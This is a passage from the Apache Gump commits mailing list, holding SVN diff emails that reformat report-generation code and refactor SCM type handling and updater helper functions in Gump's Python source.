depOrder=createOrderedList(sortedProjectList,compareProjectsByFullDependeeCount) - + + totalAffected = 0 + + projectsSection = document.createSection('Projects with issues...') + projectsSection.createParagraph(\ + """These are the project that need 'fixing'. +This page helps Gumpmeisters (and others) locate the main areas to focus attention.""") + projectsTable = projectsSection.createTable(['Name', + 'Dependees', 'Affected', + 'Project State', + 'Duration\nin state']) + pcount = 0 + + depOrder = createOrderedList(sortedProjectList, + compareProjectsByFullDependeeCount) + for project in depOrder: # Hack for bad data - if not project.inModule(): continue - - if not self.gumpSet.inProjectSequence(project): continue - - if not project.getState()==STATE_FAILED: - continue - - pcount+=1 - - # + if not project.inModule(): + continue + + if not self.gumpSet.inProjectSequence(project): + continue + + if not project.getState() == STATE_FAILED: + continue + + pcount += 1 + + # # Determine the number of projects this module (or its projects) # cause not to be run. # - affected=project.countAffectedProjects() - + affected = project.countAffectedProjects() + totalAffected += affected - - - projectRow=projectsTable.createRow() + + + projectRow = projectsTable.createRow() projectRow.createComment(project.getName()) - - self.insertLink(project,self.workspace,projectRow.createData()) - - projectRow.createData( project.getFullDependeeCount()) + + self.insertLink(project, self.workspace, projectRow.createData()) + + projectRow.createData(project.getFullDependeeCount()) projectRow.createData(affected) - - self.insertStateIcon(project,self.workspace,projectRow.createData()) - + + self.insertStateIcon(project, self.workspace, + projectRow.createData()) + # How long been like this - seq=stats=project.getStats().sequenceInState + seq = project.getStats().sequenceInState projectRow.createData(seq) - - if not pcount: - projectsTable.createLine('None') + + if not pcount: + projectsTable.createLine('None') else: projectsSection.createParagraph( 'Total Affected Projects: ' + str(totalAffected)) - + document.serialize() - + # # ---------------------------------------------------------------------- # # project_fixes.xml -- Projects w/ fixes in build order # - spec=self.resolver.getFileSpec(self.workspace, 'project_fixes') - document=XDocDocument('Project Fixes', - spec.getFile() , - self.config, - spec.getRootPath()) + spec = self.resolver.getFileSpec(self.workspace, 'project_fixes') + document = XDocDocument('Project Fixes', + spec.getFile(), + self.config, + spec.getRootPath()) self.documentSummary(document, self.workspace.getProjectSummary()) - - projectsSection=document.createSection('Projects recently fixed...') - projectsSection.createParagraph("""These are the projects that were 'fixed' (state changed to success from failed) within %s runs. + + projectsSection = document.createSection('Projects recently fixed...') + projectsSection.createParagraph(\ + """These are the projects that were 'fixed' (state changed to success from failed) within %s runs. This page helps Gumpmeisters (and others) observe community progress. - """ % INSIGNIFICANT_DURATION) - - projectsTable=projectsSection.createTable(['Name', \ - 'Dependees','Project State','Duration\nin state']) - pcount=0 + """ % INSIGNIFICANT_DURATION) + + projectsTable = projectsSection.createTable(['Name', 'Dependees', + 'Project State', + 'Duration\nin state']) + pcount = 0 for project in sortedProjectList: # Hack for bad data - if not project.inModule(): continue + if not project.inModule(): + continue # Filter - if not self.gumpSet.inProjectSequence(project): continue - - if not project.getState()==STATE_SUCCESS or \ - not project.getStats().previousState==STATE_FAILED or \ + if not self.gumpSet.inProjectSequence(project): + continue + + if not project.getState() == STATE_SUCCESS or \ + not project.getStats().previousState == STATE_FAILED or \ not project.getStats().sequenceInState < INSIGNIFICANT_DURATION: continue - - pcount+=1 - - projectRow=projectsTable.createRow() + + pcount += 1 + + projectRow = projectsTable.createRow() projectRow.createComment(project.getName()) - - self.insertLink(project,self.workspace,projectRow.createData()) - - projectRow.createData( project.getFullDependeeCount()) - - self.insertStateIcon(project,self.workspace,projectRow.createData()) - + + self.insertLink(project, self.workspace, projectRow.createData()) + + projectRow.createData(project.getFullDependeeCount()) + + self.insertStateIcon(project, self.workspace, + projectRow.createData()) + # How long been like this - seq=stats=project.getStats().sequenceInState + seq = project.getStats().sequenceInState projectRow.createData(seq) - - if not pcount: - projectsTable.createLine('None') - + + if not pcount: + projectsTable.createLine('None') + document.serialize() - + # # ---------------------------------------------------------------------- # # project_prereqs.xml -- Projects w/ prereqs in build order # - spec=self.resolver.getFileSpec(self.workspace, 'project_prereqs') - document=XDocDocument('Project Prerequisite Failures', - spec.getFile() , - self.config, - spec.getRootPath()) + spec = self.resolver.getFileSpec(self.workspace, 'project_prereqs') + document = XDocDocument('Project Prerequisite Failures', + spec.getFile(), + self.config, + spec.getRootPath()) self.documentSummary(document, self.workspace.getProjectSummary()) - - projectsSection=document.createSection('Projects recently fixed...') - projectsSection.createParagraph("""These are the projects that depend upon others being fixed before they can be built.""") - - projectsTable=projectsSection.createTable(['Name', \ - 'Depends','Not-Built Depends','Project State','Duration\nin state']) - pcount=0 + + projectsSection = document.createSection('Projects recently fixed...') + projectsSection.createParagraph(\ + """These are the projects that depend upon others being fixed before they can be built.""") + + projectsTable = projectsSection.createTable(['Name', 'Depends', + 'Not-Built Depends', + 'Project State', + 'Duration\nin state']) + pcount = 0 for project in sortedProjectList: # Hack for bad data - if not project.inModule(): continue - # Filter - if not self.gumpSet.inProjectSequence(project): continue - - if not project.getState()==STATE_PREREQ_FAILED: - continue - - pcount+=1 - - projectRow=projectsTable.createRow() + if not project.inModule(): + continue + # Filter + if not self.gumpSet.inProjectSequence(project): + continue + + if not project.getState() == STATE_PREREQ_FAILED: + continue + + pcount += 1 + + projectRow = projectsTable.createRow() projectRow.createComment(project.getName()) - - self.insertLink(project,self.workspace,projectRow.createData()) - + + self.insertLink(project, self.workspace, projectRow.createData()) + projectRow.createData(project.getFullDependencyCount()) - + # Count unbuilt dependencies - unbuilt=0 + unbuilt = 0 for dep in project.getFullDependencyProjectList(): if not dep.isSuccess(): - unbuilt+=1 + unbuilt += 1 projectRow.createData(unbuilt) - - self.insertStateIcon(project,self.workspace,projectRow.createData()) - + + self.insertStateIcon(project, self.workspace, + projectRow.createData()) + # How long been like this - seq=stats=project.getStats().sequenceInState + seq = project.getStats().sequenceInState projectRow.createData(seq) - - if not pcount: - projectsTable.createLine('None') - - document.serialize() - - def documentModules(self): - + + if not pcount: + projectsTable.createLine('None') + + document.serialize() + + def documentModules(self): + # # ---------------------------------------------------------------------- # # module_todos.xml # - spec=self.resolver.getFileSpec(self.workspace, 'module_todos') - document=XDocDocument('Modules with issues', - spec.getFile() , - self.config, - spec.getRootPath()) - - modulesSection=document.createSection('Modules with TODOs') - modulesSection.createParagraph("""These are the modules that need 'fixing', or contained projects that need fixing. -This page helps Gumpmeisters (and others) locate the main areas to focus attention.""") - modulesTable=modulesSection.createTable(['Name','Duration\nin state','Module State', \ - 'Project State(s)','Elapsed']) - - mcount=0 - for module in self.gumpSet.getCompletedModules(): - + spec = self.resolver.getFileSpec(self.workspace, 'module_todos') + document = XDocDocument('Modules with issues', + spec.getFile(), + self.config, + spec.getRootPath()) + + modulesSection = document.createSection('Modules with TODOs') + modulesSection.createParagraph(\ + """These are the modules that need 'fixing', or contained projects that need fixing. +This page helps Gumpmeisters (and others) locate the main areas to focus attention.""") + modulesTable = modulesSection.createTable(['Name', 'Duration\nin state', + 'Module State', + 'Project State(s)', + 'Elapsed']) + + mcount = 0 + for module in self.gumpSet.getCompletedModules(): + # # Determine if there are todos, otherwise continue # - todos=0 + todos = 0 for pair in module.aggregateStates(): - if pair.state==STATE_FAILED: - todos=1 - if not todos: continue + if pair.state == STATE_FAILED: + todos = 1 + if not todos: + continue # Shown something... - mcount+=1 - + mcount += 1 + # Determine longest sequence in this (failed) state... # for any of the projects - seq=0 + seq = 0 for project in module.getProjects(): - if project.getState()==STATE_FAILED: - stats=project.getStats() - if stats.sequenceInState > seq: seq = stats.sequenceInState - + if project.getState() == STATE_FAILED: + stats = project.getStats() + if stats.sequenceInState > seq: + seq = stats.sequenceInState + # Determine the number of projects this module (or its projects) # cause not to be run. - + # Display - moduleRow=modulesTable.createRow() - moduleRow.createComment(module.getName()) - self.insertLink(module,self.workspace,moduleRow.createData()) - + moduleRow = modulesTable.createRow() + moduleRow.createComment(module.getName()) + self.insertLink(module, self.workspace, moduleRow.createData()) + moduleRow.createData(seq) - - self.insertStateIcon(module,self.workspace,moduleRow.createData()) - self.insertStateIcons(module,self.workspace,moduleRow.createData()) - - moduleRow.createData(secsToElapsedTimeString(module.getElapsedSecs())) - - if not mcount: modulesTable.createLine('None') - + + self.insertStateIcon(module, self.workspace, moduleRow.createData()) + self.insertStateIcons(module, self.workspace, + moduleRow.createData()) + + moduleRow.createData(secsToElapsedTimeString(module\ + .getElapsedSecs())) + + if not mcount: + modulesTable.createLine('None') + document.serialize() - - + + # # ---------------------------------------------------------------------- # # module_fixes.xml # - spec=self.resolver.getFileSpec(self.workspace, 'module_fixes') - document=XDocDocument('Modules with fixes', - spec.getFile() , - self.config, - spec.getRootPath()) - - modulesSection=document.createSection('Modules recently fixed') - modulesSection.createParagraph("""These are the modules that were 'fixed' (state changed to success), or contained projects that were fixed, within %s runs. + spec = self.resolver.getFileSpec(self.workspace, 'module_fixes') + document = XDocDocument('Modules with fixes', + spec.getFile(), + self.config, + spec.getRootPath()) + + modulesSection = document.createSection('Modules recently fixed') + modulesSection.createParagraph(\ + """These are the modules that were 'fixed' (state changed to success), or contained projects that were fixed, within %s runs. This page helps Gumpmeisters (and others) observe community progress. - """ % INSIGNIFICANT_DURATION) - - modulesTable=modulesSection.createTable(['Name','Duration\nin state','Module State', \ - 'Project State(s)','Elapsed']) - - mcount=0 - for module in self.gumpSet.getCompletedModules(): - + """ % INSIGNIFICANT_DURATION) + + modulesTable = modulesSection.createTable(['Name', 'Duration\nin state', + 'Module State', + 'Project State(s)', + 'Elapsed']) + + mcount = 0 + for module in self.gumpSet.getCompletedModules(): + # # Determine if there are mcount, otherwise continue # - mcount=0 + mcount = 0 for pair in module.aggregateStates(): if pair.state == STATE_SUCCESS \ - and module.getStats().sequenceInState < INSIGNIFICANT_DURATION: - mcount=1 - - if not mcount: continue - + and module.getStats().sequenceInState < \ + INSIGNIFICANT_DURATION: + mcount = 1 + + if not mcount: + continue + # Shown something... - mcount+=1 - + mcount += 1 + [... 4241 lines stripped ...] From [email protected] Mon Feb 23 05:47:51 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13651 invoked from network); 23 Feb 2009 05:47:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Feb 2009 05:47:50 -0000 Received: (qmail 41662 invoked by uid 500); 23 Feb 2009 05:47:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41653 invoked by uid 99); 23 Feb 2009 05:47:50 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 22 Feb 2009 21:47:50 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 23 Feb 2009 05:47:47 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id B78A123888A3; Mon, 23 Feb 2009 05:47:26 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r746892 - in /gump/trunk/python/gump: actor/document/xdocs/documenter.py core/model/module.py core/model/repository.py core/update/scmupdater.py core/update/updater.py test/model.py Date: Mon, 23 Feb 2009 05:47:26 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Mon Feb 23 05:47:25 2009 New Revision: 746892 URL: http://svn.apache.org/viewvc?rev=746892&view=rev Log: get rid of string constants Modified: gump/trunk/python/gump/actor/document/xdocs/documenter.py gump/trunk/python/gump/core/model/module.py gump/trunk/python/gump/core/model/repository.py gump/trunk/python/gump/core/update/scmupdater.py gump/trunk/python/gump/core/update/updater.py gump/trunk/python/gump/test/model.py Modified: gump/trunk/python/gump/actor/document/xdocs/documenter.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/actor/document/xdocs/documenter.py?rev=746892&r1=746891&r2=746892&view=diff ============================================================================== --- gump/trunk/python/gump/actor/document/xdocs/documenter.py (original) +++ gump/trunk/python/gump/actor/document/xdocs/documenter.py Mon Feb 23 05:47:25 2009 @@ -39,6 +39,7 @@ from gump.core.language.path import AnnotatedPath from gump.core.model.misc import Resultable from gump.core.model.project import Project +from gump.core.model.repository import SCM_TYPE_CVS, SCM_TYPE_P4 from gump.core.model.state import REASON_BUILD_FAILED, REASON_PACKAGE, \ REASON_UNSET, reasonDescription, STATE_COMPLETE, STATE_FAILED, \ STATE_PREREQ_FAILED, STATE_SUCCESS, STATE_UNSET, stateDescription, stateName @@ -1476,8 +1477,8 @@ if repo.hasTitle(): detailList.createEntry('Title: ', repo.getTitle()) - if repo.hasType(): - detailList.createEntry('Type: ', repo.getType()) + if repo.hasScmType(): + detailList.createEntry('Type: ', repo.getScmType().name) if repo.hasHomePage(): detailList.createEntry('Homepage: ') \ @@ -1799,11 +1800,11 @@ scm = module.getScm() if scm: - scmName = scm.getScmName() + scmName = scm.getScmType().displayName if scm.hasDir(): repoList.createEntry(scmName + " Directory: ", scm.getDir()) - if scm.getScmType() == 'cvs': + if scm.getScmType() == SCM_TYPE_CVS: if scm.hasModule(): repoList.createEntry(scmName + " Module: ", scm.getModule()) @@ -1817,7 +1818,7 @@ repoList.createEntry("CVSROOT: ", scm.getCvsRoot()) - elif scm.getScmType() == 'p4': + elif scm.getScmType() == SCM_TYPE_P4: if scm.hasTag(): repoList.createEntry(scmName + " Tag: ", scm.getTag()) Modified: gump/trunk/python/gump/core/model/module.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/model/module.py?rev=746892&r1=746891&r2=746892&view=diff ============================================================================== --- gump/trunk/python/gump/core/model/module.py (original) +++ gump/trunk/python/gump/core/model/module.py Mon Feb 23 05:47:25 2009 @@ -25,6 +25,8 @@ from gump.core.model.misc import Resultable, Positioned, AddressPair from gump.core.model.object import NamedModelObject, ModelObject from gump.core.model.project import Project, ProjectSummary +from gump.core.model.repository import SCM_TYPE_ARTIFACTS, SCM_TYPE_CVS, \ + SCM_TYPE_P4, SUPPORTED_SCMS from gump.core.model.state import REASON_CONFIG_FAILED, REASON_PACKAGE, \ STATE_COMPLETE, STATE_FAILED from gump.core.model.stats import Statable, Statistics @@ -40,11 +42,11 @@ """ Factory method for matching ModuleScm subclass of given SCM """ - if scm_type == 'cvs': + if scm_type == SCM_TYPE_CVS: return ModuleCvs(dom, repo) - elif scm_type == 'p4': + elif scm_type == SCM_TYPE_P4: return ModuleP4(dom, repo) - elif scm_type == 'artifacts': + elif scm_type == SCM_TYPE_ARTIFACTS: return ModuleArtifacts(dom, repo) return ModuleScm(dom, repo) @@ -61,7 +63,6 @@ # Extract settings self.dir = self.getDomAttributeValue('dir') - self.type = self.element.tagName def getRootUrl(self): url = self.repository.getUrl() @@ -81,10 +82,7 @@ return self.getRootUrl() def getScmType(self): - return self.type - - def getScmName(self): - return self.repository.getType() + return self.repository.getScmType() class ModuleCvs(ModuleScm): """ @@ -483,11 +481,9 @@ Parses the child element that holds SCM information """ - # sorted by priority, the first matching SCM element wins - supportedScms = ['cvs', 'svn', 'p4', 'git', 'artifacts'] - for s in supportedScms: - if self.hasDomChild(s): - dom = self.getDomChild(s) + for s in SUPPORTED_SCMS: + if self.hasDomChild(s.name): + dom = self.getDomChild(s.name) repoName = getDomAttributeValue(dom, 'repository') if repoName: if self.workspace.hasRepository(repoName): Modified: gump/trunk/python/gump/core/model/repository.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/model/repository.py?rev=746892&r1=746891&r2=746892&view=diff ============================================================================== --- gump/trunk/python/gump/core/model/repository.py (original) +++ gump/trunk/python/gump/core/model/repository.py Mon Feb 23 05:47:25 2009 @@ -22,6 +22,35 @@ from gump.util import getIndent from gump.util.domutils import getDomChildValue +class ScmType: + """ + enum-like class describing all supported SCMs + """ + + def __init__(self, name, displayName): + self.name = name + self.displayName = displayName + +SCM_TYPE_CVS = ScmType('cvs', 'CVS') +SCM_TYPE_SVN = ScmType('svn', 'Subversion') +SCM_TYPE_ARTIFACTS = ScmType('artifacts', 'Artfifacts') +SCM_TYPE_P4 = ScmType('p4', 'Perforce') +SCM_TYPE_GIT = ScmType('git', 'Git') + +# sorted by priority, the first matching SCM element inside a module wins +SUPPORTED_SCMS = [SCM_TYPE_CVS, SCM_TYPE_SVN, SCM_TYPE_P4, + SCM_TYPE_GIT, + SCM_TYPE_ARTIFACTS] + +def scm_type_for_name(name): + """ + looks up a supported SCM by its name + """ + for s in SUPPORTED_SCMS: + if s.name == name: + return s + return None + class Repository(NamedModelObject, Statable): """ @@ -34,17 +63,12 @@ self.url = None - typeToLabel = {'cvs':'CVS', 'svn':'Subversion', 'artifact':'Artifact', - 'p4':'Perforce', 'git':'Git'} - - type = self.getDomAttributeValue('type') + typeAttribute = self.getDomAttributeValue('type') + self.scmType = scm_type_for_name(typeAttribute) + if not self.scmType: + raise RuntimeError, 'Invalid Repository Type:' + str(typeAttribute) - try: - self.type = typeToLabel[type] - except: - raise RuntimeError, 'Invalid Repository Type:' + str(type) - - if 'cvs' == type: + if SCM_TYPE_CVS == self.scmType: self.web = self.getDomChildValue('web') or \ self.getDomChildValue('cvsweb') if self.hasDomChild('root'): @@ -57,7 +81,7 @@ else: raise RuntimeError, 'No XML <root on repository: ' \ + self.getName() - elif 'p4' == type: + elif SCM_TYPE_P4 == self.scmType: if self.hasDomChild('root'): root = self.getDomChild('root') self.p4port = getDomChildValue(root, 'hostname') @@ -69,8 +93,8 @@ if self.hasDomChild('url'): self.url = self.getDomChildValue('url') else: - raise RuntimeError, 'No URL on ' + self.type + ' repository: ' \ - + self.getName() + raise RuntimeError, 'No URL on ' + self.scmType.displayName + \ + ' repository: ' + self.getName() self.web = self.getDomChildValue('web') self.user = self.getDomChildValue('user') self.password = self.getDomChildValue('password') @@ -90,13 +114,13 @@ return True return False - def hasType(self): - if self.type: + def hasScmType(self): + if self.scmType: return True return False - def getType(self): - return self.type + def getScmType(self): + return self.scmType def getModules(self): return self.modules Modified: gump/trunk/python/gump/core/update/scmupdater.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/scmupdater.py?rev=746892&r1=746891&r2=746892&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/scmupdater.py (original) +++ gump/trunk/python/gump/core/update/scmupdater.py Mon Feb 23 05:47:25 2009 @@ -57,7 +57,7 @@ Performs a fresh check-out or an update of an existing wrokspace. """ - log.info('Perform ' + module.getScm().getScmName() + \ + log.info('Perform ' + module.getScm().getScmType().displayName + \ ' Checkout/Update on #[' + `module.getPosition()` + \ '] : ' + module.getName()) @@ -65,11 +65,12 @@ if cmd: if isUpdate: - log.debug(module.getScm().getScmName() + " Module Update : " + \ + log.debug(module.getScm().getScmType().displayName + \ + " Module Update : " + \ module.getName() + ", Repository Name: " + \ module.repository.getName()) else: - log.debug(module.getScm().getScmName() + \ + log.debug(module.getScm().getScmType().displayName + \ " Module Checkout : " + module.getName() + \ ", Repository Name: " + \ module.repository.getName()) Modified: gump/trunk/python/gump/core/update/updater.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/updater.py?rev=746892&r1=746891&r2=746892&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/updater.py (original) +++ gump/trunk/python/gump/core/update/updater.py Mon Feb 23 05:47:25 2009 @@ -23,6 +23,8 @@ import os.path from gump import log +from gump.core.model.repository import SCM_TYPE_CVS, SCM_TYPE_GIT, \ + SCM_TYPE_SVN, SCM_TYPE_P4 from gump.core.model.workspace import catFileToFileHolder, \ EXIT_CODE_FAILED, EXIT_CODE_SUCCESS, FILE_TYPE_LOG, \ gumpSafeName, logResourceUtilization, \ @@ -95,8 +97,12 @@ def __init__(self, run): RunSpecific.__init__(self, run) - self.updaters = {'cvs' : CvsUpdater(run), 'svn' : SvnUpdater(run), - 'p4' : P4Updater(run), 'git' : GitUpdater(run)} + self.updaters = { + SCM_TYPE_CVS : CvsUpdater(run), + SCM_TYPE_SVN : SvnUpdater(run), + SCM_TYPE_P4 : P4Updater(run), + SCM_TYPE_GIT : GitUpdater(run) + } # ****************************************************************** Modified: gump/trunk/python/gump/test/model.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/test/model.py?rev=746892&r1=746891&r2=746892&view=diff ============================================================================== --- gump/trunk/python/gump/test/model.py (original) +++ gump/trunk/python/gump/test/model.py Mon Feb 23 05:47:25 2009 @@ -27,6 +27,7 @@ from gump import log import gump.core.config +from gump.core.model.repository import SCM_TYPE_CVS, SCM_TYPE_SVN from gump.core.model.state import * from gump.util import * from gump.test import getWorkedTestRun @@ -167,7 +168,7 @@ module2=self.module2 self.assertTrue('Module has CVS', - module1.getScm().getScmType() == 'cvs') + module1.getScm().getScmType() == SCM_TYPE_CVS) self.assertNonZeroString('CVSROOT',module1.cvs.getCvsRoot()) self.assertNonZeroString('Has Tag',module1.cvs.getTag()) self.assertNonZeroString('Has Tag',module2.getTag()) @@ -176,7 +177,7 @@ svnmodule1= self.workspace.getModule('svn_module1') self.assertTrue('Module has SVN', - module1.getScm().getScmType() == 'svn') + module1.getScm().getScmType() == SCM_TYPE_SVN) self.assertNonZeroString('SVN URL',svnmodule1.svn.getRootUrl()) self.assertTrue('SVN Dir',svnmodule1.svn.hasDir()) From [email protected] Tue Feb 24 03:46:43 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88333 invoked from network); 24 Feb 2009 03:46:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Feb 2009 03:46:43 -0000 Received: (qmail 89751 invoked by uid 500); 24 Feb 2009 03:46:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89742 invoked by uid 99); 24 Feb 2009 03:46:43 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 23 Feb 2009 19:46:43 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 24 Feb 2009 03:46:42 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id F216C23888A5; Tue, 24 Feb 2009 03:46:21 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r747270 - in /gump/trunk/python/gump/core/update: cvs.py git.py scmupdater.py svn.py Date: Tue, 24 Feb 2009 03:46:21 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Tue Feb 24 03:46:21 2009 New Revision: 747270 URL: http://svn.apache.org/viewvc?rev=747270&view=rev Log: some method to function refactoring Modified: gump/trunk/python/gump/core/update/cvs.py gump/trunk/python/gump/core/update/git.py gump/trunk/python/gump/core/update/scmupdater.py gump/trunk/python/gump/core/update/svn.py Modified: gump/trunk/python/gump/core/update/cvs.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/cvs.py?rev=747270&r1=747269&r2=747270&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/cvs.py (original) +++ gump/trunk/python/gump/core/update/cvs.py Tue Feb 24 03:46:21 2009 @@ -16,7 +16,7 @@ # limitations under the License. from gump.core.model.workspace import Cmd -from gump.core.update.scmupdater import ScmUpdater +from gump.core.update.scmupdater import ScmUpdater, should_be_quiet from gump.tool.integration.cvs import readLogins, loginToRepositoryOnDemand def maybe_add_tag(module, cmd): @@ -29,6 +29,18 @@ if tag: cmd.addParameter('-r', tag, ' ') +def setup_common_parameters(module, cmd): + if should_be_quiet(module): + cmd.addParameter('-q') + elif module.isDebug(): + cmd.addParameter('-t') + # Request compression + cmd.addParameter('-z3') + + # Set the CVS root + cmd.addParameter('-d', module.getScm().getCvsRoot()) + + ############################################################################### # Classes ############################################################################### @@ -54,7 +66,7 @@ cmd = Cmd('cvs', 'update_' + module.getName(), module.getWorkspace().getSourceControlStagingDirectory()) - self.setupCommonParameters(module, cmd) + setup_common_parameters(module, cmd) # do a cvs checkout cmd.addParameter('checkout') @@ -81,7 +93,7 @@ cmd = Cmd('cvs', 'update_' + module.getName(), module.getSourceControlStagingDirectory()) - self.setupCommonParameters(module, cmd) + setup_common_parameters(module, cmd) # Do a cvs update cmd.addParameter('update') @@ -91,17 +103,6 @@ return cmd - def setupCommonParameters(self, module, cmd): - if self.shouldBeQuiet(module): - cmd.addParameter('-q') - elif module.isDebug(): - cmd.addParameter('-t') - # Request compression - cmd.addParameter('-z3') - - # Set the CVS root - cmd.addParameter('-d', module.getScm().getCvsRoot()) - def maybeLogin(self, module): repository = module.repository root = module.getScm().getCvsRoot() Modified: gump/trunk/python/gump/core/update/git.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/git.py?rev=747270&r1=747269&r2=747270&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/git.py (original) +++ gump/trunk/python/gump/core/update/git.py Tue Feb 24 03:46:21 2009 @@ -18,7 +18,7 @@ from gump import log from gump.core.model.workspace import Cmd -from gump.core.update.scmupdater import ScmUpdater +from gump.core.update.scmupdater import ScmUpdater, should_be_quiet def log_repository_and_url(module): repository = module.repository @@ -27,6 +27,10 @@ repository.getName()) +def maybe_make_quiet(module, cmd): + if should_be_quiet(module): + cmd.addParameter('--quiet') + ############################################################################### # Classes ############################################################################### @@ -47,7 +51,7 @@ log_repository_and_url(module) cmd = Cmd('git-clone', 'update_' + module.getName(), module.getWorkspace().getSourceControlStagingDirectory()) - self.maybeMakeQuiet(module, cmd) + maybe_make_quiet(module, cmd) cmd.addParameter(module.getScm().getRootUrl()) cmd.addParameter(module.getName()) return cmd @@ -59,9 +63,5 @@ log_repository_and_url(module) cmd = Cmd('git-pull', 'update_' + module.getName(), module.getSourceControlStagingDirectory()) - self.maybeMakeQuiet(module, cmd) + maybe_make_quiet(module, cmd) return cmd - - def maybeMakeQuiet(self, module, cmd): - if self.shouldBeQuiet(module): - cmd.addParameter('--quiet') Modified: gump/trunk/python/gump/core/update/scmupdater.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/scmupdater.py?rev=747270&r1=747269&r2=747270&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/scmupdater.py (original) +++ gump/trunk/python/gump/core/update/scmupdater.py Tue Feb 24 03:46:21 2009 @@ -24,6 +24,17 @@ REASON_UPDATE_FAILED, STATE_FAILED, STATE_SUCCESS, WORK_TYPE_UPDATE from gump.core.run.gumprun import RunSpecific +def should_be_quiet(module): + """ + Whether the configuration asks for a quiet update + (it does so by default) + """ + return not module.isDebug() \ + and not module.isVerbose() \ + and not module.getScm().isDebug() \ + and not module.getScm().isVerbose() + + ############################################################################### # Classes ############################################################################### @@ -101,17 +112,6 @@ # helpers # - def shouldBeQuiet(self, module): - """ - Whether the configuration asks for a quiet update - (it does so by default) - """ - return not module.isDebug() \ - and not module.isVerbose() \ - and not module.getScm().isDebug() \ - and not module.getScm().isVerbose() - - def getCommandAndType(self, module): """ Checks whether an update or a fresh checkout is needed and Modified: gump/trunk/python/gump/core/update/svn.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/svn.py?rev=747270&r1=747269&r2=747270&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/svn.py (original) +++ gump/trunk/python/gump/core/update/svn.py Tue Feb 24 03:46:21 2009 @@ -18,7 +18,55 @@ from gump import log from gump.core.model.workspace import Cmd -from gump.core.update.scmupdater import ScmUpdater +from gump.core.update.scmupdater import ScmUpdater, should_be_quiet + +def getCommand(module, forUpdate): + """ + Build the appropriate SVN command for checkout or update + """ + repository = module.repository + url = module.getScm().getRootUrl() + + log.debug("SVN URL: [" + url + "] on Repository: "\ + + repository.getName()) + + # + # Prepare SVN checkout/update command... + # + cmd = Cmd('svn', 'update_'+module.getName(), + module.getWorkspace().getSourceControlStagingDirectory()) + + # + # Be 'quiet' (but not silent) unless requested otherwise. + # + if should_be_quiet(module): + cmd.addParameter('--quiet') + + if forUpdate: + cmd.addParameter('update') + else: + cmd.addParameter('checkout', url) + + # + # Request non-interactive + # + cmd.addParameter('--non-interactive') + + # Optional username/password + if repository.hasUser(): + cmd.addParameter('--username', repository.getUser()) + if repository.hasPassword(): + cmd.addParameter('--password', repository.getPassword()) + + # + # If module name != SVN directory, tell SVN to put it into + # a directory named after our module + # + if not module.getScm().hasDir() or \ + not module.getScm().getDir() == module.getName(): + cmd.addParameter(module.getName()) + + return cmd ############################################################################### # Classes @@ -37,58 +85,11 @@ """ Build the appropriate SVN command for checkout """ - return self.getCommand(module, False) + return getCommand(module, False) def getUpdateCommand(self, module): """ Build the appropriate SVN command for update """ - return self.getCommand(module, True) + return getCommand(module, True) - def getCommand(self, module, forUpdate): - """ - Build the appropriate SVN command for checkout or update - """ - repository = module.repository - url = module.getScm().getRootUrl() - - log.debug("SVN URL: [" + url + "] on Repository: "\ - + repository.getName()) - - # - # Prepare SVN checkout/update command... - # - cmd = Cmd('svn', 'update_'+module.getName(), - module.getWorkspace().getSourceControlStagingDirectory()) - - # - # Be 'quiet' (but not silent) unless requested otherwise. - # - if self.shouldBeQuiet(module): - 